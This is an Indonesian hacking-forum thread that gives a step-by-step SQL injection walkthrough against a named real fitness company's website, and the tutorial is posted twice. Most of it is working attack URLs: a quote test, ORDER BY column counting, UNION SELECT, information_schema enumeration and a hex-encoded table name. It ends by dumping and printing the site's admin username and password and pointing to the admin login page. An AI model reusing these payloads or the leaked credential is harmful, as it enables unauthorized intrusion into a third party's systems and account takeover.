SQL Injection Real Version (2)
2 posters
Halaman 1 dari 1
Re: SQL Injection Real Version (2)
Ikutan ah..
siapa tau bisa.. xixixixi :p
siapa tau bisa.. xixixixi :p
pr0gramm3r007- Jumlah posting : 1
Registration date : 30.10.10
SQL Injection Real Version (2)
== START ==
Code: http://www.fitnessthailand.co.th/activities_01.php?activity_id=31
Web diatas berjalan Normal
Wokeh skrg...qta Tambahkan penyedap rasa hehehe " - "
Code : http://www.fitnessthailand.co.th/activities_01.php?activity_id='31
Web Blank/kosong/Error berarti "Vuln Sql Injection"
Sekarang kita lanjutkan dengan mengecek jumlah kolom dari web ini dengan perintah "order by". Disini kita harus mengurutkan angka "1" sampai akhir hingga menampilkan error seperti ini:
Code:
http://www.fitnessthailand.co.th/activities_01.php?activity_id=31+order+by+1--
>> normal
Code:
http://www.fitnessthailand.co.th/activities_01.php?activity_id=31+order+by+2--
>> normal
Code:
http://www.fitnessthailand.co.th/activities_01.php?activity_id=31+order+by+3--
>> normal
Code:
http://www.fitnessthailand.co.th/activities_01.php?activity_id=31+order+by+4--
>> normal
Code:
http://www.fitnessthailand.co.th/activities_01.php?activity_id=31+order+by+5--
>> normal
Code:
http://www.fitnessthailand.co.th/activities_01.php?activity_id=31+order+by+6--
>> UpZz..Web Blank konten menjadi hilang/error lagi. Ini berarti kolom hanya ada 5 karena 6 tidak tersedia
NB : Perlu di ingat pengurutan ini dimulai dari angka 1 sampai tampilan error/blank, dan seterus'y. Hadooh Capek...ngaso dulu agh !!!
Setelah itu kita mengecek kolom yang bermasalah dengan perintah "union+all+select" atau "union+select" seperti ini:
Code:
http://www.fitnessthailand.co.th/activities_01.php?activity_id=-31+union+all+select+1,2,3,4,5--
Oh iya kita harus menambahkan tanda min " - " pada akhir id content seperti ini: "activity_id=-31"
Setelah itu akan muncul tampilan yang menampilkan kolom yang bermasalah seperti ini :
Muncul angka 2 & 3 yang tebal seperti diatas, angka inilah yang nantinya kita gunakan sebagai referensi.
Sekarang kita mengecek versi dari MySQL yang dipakai di web ini dengan menambahkan sintak "version()" atau "@@version" pada kolom yang bermasalah tadi seperti ini:
Code:
http://www.fitnessthailand.co.th/activities_01.php?activity_id=-31+union+all+select+1,2,version(),4,5--
Akan muncul versi dari MySQL yang dipakai seperti ini :
"5.0.45-community-nt"
Sekarang kita lanjutkan dengan menampilkan table-table dengan perintah "...group_concat(table_name)...+from+information_schema.tables+where+table_schema=database()" seperti ini:
Code:
http://www.fitnessthailand.co.th/activities_01.php?activity_id=-31+union+all+select+1,2,group_concat(table_name),4,5+from+information_schema.tables+where+table_schema=database()--
>> Akan muncul table-table seperti ini:
tbl_activity,tbl_class_description,tbl_class_period,tbl_class_schedule,tbl_class_time,tbl_class_type,tbl_facilityimage,tbl_image,tbl_mem_grp,tbl_promotions,tbl_rate,tbl_users
Setelah table sudah ada sekarang kita akan mengeluarkan column dari table tersebut dengan perintah "...group_concat(column_name)...+information_schema.columns+where+table_name=[nama hex sql table], pilihlah table yang akan ditampilkan column nya, disini ane memilih table tbl_users seperti ini:
Code:
http://www.fitnessthailand.co.th/activities_01.php?activity_id=-31+union+all+select+1,2,group_concat(column_name),4,5+from+information_schema.columns+where+table_name=0x74626c5f7573657273
0x74626c5f7573657273 >> tbl_user setelah di mysql hex encode. Untuk meng-convert menjadi mysql hex dapat menggunakan web ini: http://www.waraxe.us/sql-char-encoder.html
Kemudian column-column akan muncul seperti ini:
user_id,c_username,c_password
Sekarang kita akan mengeluarkan isi dari column c_username dan c_password dengan perintah "...group_concat([namakolom yang diinginkan],0x3a,[namakolom yang diinginkan])...+from+[nama tabel]-- seperti ini:
Code:
http://www.fitnessthailand.co.th/activities_01.php?activity_id=-31+union+all+select+1,2,group_concat(c_username,0x3a,c_password,0x3a),4,5+from+tbl_users--
fitnessthailand:ftcm410356:
Dan akan menampilkan isi dari kolom tersebut seperti ini :
Terakhir Tgl cari halaman adminnya.
halaman admin --> http://www.fitnessthailand.co.th/admin/
Code: http://www.fitnessthailand.co.th/activities_01.php?activity_id=31
Web diatas berjalan Normal
Wokeh skrg...qta Tambahkan penyedap rasa hehehe " - "
Code : http://www.fitnessthailand.co.th/activities_01.php?activity_id='31
Web Blank/kosong/Error berarti "Vuln Sql Injection"
Sekarang kita lanjutkan dengan mengecek jumlah kolom dari web ini dengan perintah "order by". Disini kita harus mengurutkan angka "1" sampai akhir hingga menampilkan error seperti ini:
Code:
http://www.fitnessthailand.co.th/activities_01.php?activity_id=31+order+by+1--
>> normal
Code:
http://www.fitnessthailand.co.th/activities_01.php?activity_id=31+order+by+2--
>> normal
Code:
http://www.fitnessthailand.co.th/activities_01.php?activity_id=31+order+by+3--
>> normal
Code:
http://www.fitnessthailand.co.th/activities_01.php?activity_id=31+order+by+4--
>> normal
Code:
http://www.fitnessthailand.co.th/activities_01.php?activity_id=31+order+by+5--
>> normal
Code:
http://www.fitnessthailand.co.th/activities_01.php?activity_id=31+order+by+6--
>> UpZz..Web Blank konten menjadi hilang/error lagi. Ini berarti kolom hanya ada 5 karena 6 tidak tersedia
NB : Perlu di ingat pengurutan ini dimulai dari angka 1 sampai tampilan error/blank, dan seterus'y. Hadooh Capek...ngaso dulu agh !!!
Setelah itu kita mengecek kolom yang bermasalah dengan perintah "union+all+select" atau "union+select" seperti ini:
Code:
http://www.fitnessthailand.co.th/activities_01.php?activity_id=-31+union+all+select+1,2,3,4,5--
Oh iya kita harus menambahkan tanda min " - " pada akhir id content seperti ini: "activity_id=-31"
Setelah itu akan muncul tampilan yang menampilkan kolom yang bermasalah seperti ini :
Muncul angka 2 & 3 yang tebal seperti diatas, angka inilah yang nantinya kita gunakan sebagai referensi.
Sekarang kita mengecek versi dari MySQL yang dipakai di web ini dengan menambahkan sintak "version()" atau "@@version" pada kolom yang bermasalah tadi seperti ini:
Code:
http://www.fitnessthailand.co.th/activities_01.php?activity_id=-31+union+all+select+1,2,version(),4,5--
Akan muncul versi dari MySQL yang dipakai seperti ini :
"5.0.45-community-nt"
Sekarang kita lanjutkan dengan menampilkan table-table dengan perintah "...group_concat(table_name)...+from+information_schema.tables+where+table_schema=database()" seperti ini:
Code:
http://www.fitnessthailand.co.th/activities_01.php?activity_id=-31+union+all+select+1,2,group_concat(table_name),4,5+from+information_schema.tables+where+table_schema=database()--
>> Akan muncul table-table seperti ini:
tbl_activity,tbl_class_description,tbl_class_period,tbl_class_schedule,tbl_class_time,tbl_class_type,tbl_facilityimage,tbl_image,tbl_mem_grp,tbl_promotions,tbl_rate,tbl_users
Setelah table sudah ada sekarang kita akan mengeluarkan column dari table tersebut dengan perintah "...group_concat(column_name)...+information_schema.columns+where+table_name=[nama hex sql table], pilihlah table yang akan ditampilkan column nya, disini ane memilih table tbl_users seperti ini:
Code:
http://www.fitnessthailand.co.th/activities_01.php?activity_id=-31+union+all+select+1,2,group_concat(column_name),4,5+from+information_schema.columns+where+table_name=0x74626c5f7573657273
0x74626c5f7573657273 >> tbl_user setelah di mysql hex encode. Untuk meng-convert menjadi mysql hex dapat menggunakan web ini: http://www.waraxe.us/sql-char-encoder.html
Kemudian column-column akan muncul seperti ini:
user_id,c_username,c_password
Sekarang kita akan mengeluarkan isi dari column c_username dan c_password dengan perintah "...group_concat([namakolom yang diinginkan],0x3a,[namakolom yang diinginkan])...+from+[nama tabel]-- seperti ini:
Code:
http://www.fitnessthailand.co.th/activities_01.php?activity_id=-31+union+all+select+1,2,group_concat(c_username,0x3a,c_password,0x3a),4,5+from+tbl_users--
fitnessthailand:ftcm410356:
Dan akan menampilkan isi dari kolom tersebut seperti ini :
Terakhir Tgl cari halaman adminnya.
halaman admin --> http://www.fitnessthailand.co.th/admin/
syaf- Pejuang
- Jumlah posting : 63
Age : 78
Lokasi : ~#root | system32
Registration date : 25.02.09
Halaman 1 dari 1
Permissions in this forum:
Anda tidak dapat menjawab topik
|
|